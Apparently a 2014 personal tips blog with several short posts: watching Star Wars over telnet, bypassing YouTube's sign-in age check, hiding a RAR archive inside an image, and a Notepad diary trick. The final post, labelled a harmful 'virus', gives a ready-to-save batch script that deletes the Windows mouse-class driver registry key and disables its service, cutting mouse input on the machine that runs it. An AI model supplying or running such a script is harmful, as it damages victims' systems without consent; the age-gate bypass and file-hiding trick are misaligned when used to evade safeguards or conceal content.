Official website of R Om Prakash Welcome to my website. I hope you find the information here relevant and useful.If you have any suggestions as to how I might further enhance my website, please do not hesitate to contact me @ rdeepak4@sify.com Software piracy is theft. If you're looking for illegal files, such as crack, password, serial numbers, registration codes, key generators you're exposing to the risk of having your computer infected with viruses.Thank you !

Saturday, February 15, 2014

Watch Star Wars Movie in CMD / TERMINAL



 This is very interesting and amazing command prompt trick which will play star wars movie in the command prompt or cmd. Below are complete steps with screen shots for this trick with.


        1. Go to start> Run and type in cmd and press enter.

       2. Now type in telnet as shown below and press enter.



         3. After that enter o as shown below and press enter.



         4. Next enter towel.blinkenlights.nl as shown below and press enter.


Now star wars movie will be played on your command prompt.




Watch 18+ Videos On Youtube Without Signing In



How To Watch 18+ Youtube Videos Without Logging In ?

1. First get the url of video you want to watch. As shown below.
http://www.youtube.com/watch?v=4Xkh6j7RMqk 

2. Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk


3. Now paste the Video Id in the link given below.
http://www.youtube.com/v/VideoId?fs=1
  • Replace VideoId with the Id you copied in Step 2
4. Now the url will become as shown below.
http://www.youtube.com/v/4Xkh6j7RMqk?fs=1
5. Done.

Friday, February 14, 2014

How to hide file behind an Image ?



In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.


cd desktop





5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.


 Copy /b imagename.jpg + filename.rar finalimage.jpg






  • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
  • Replace filename with name of your file you want to hide. It must be in .rar format.
  • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

    1. Open winrar
    2. Now locate your image and open it or simply drag your image in winrar.
    3. Extract the file and done.

Thursday, February 13, 2014

Make Personal Diary using Notepad


 Do you know that you can use your Notepad as a simple digital diary or a personal Log-Book to keep record of your daily work instead of using boring pen and book ? Well, if you dont know then follow the below mentioned steps to make one for yourself !


  • First open up the Notepad.
  • Then Type in .LOG (in capital letters) and press enter.
  • Save it with any name and close it.
  • Open the file again.

              When you open the file again you will see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the the notepad file.

Friday, February 7, 2014

Make a Virus that Disables Mouse


  • We will be making a batch virus which is harmful, it will disable your mouse so think before trying it on yourself.
  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.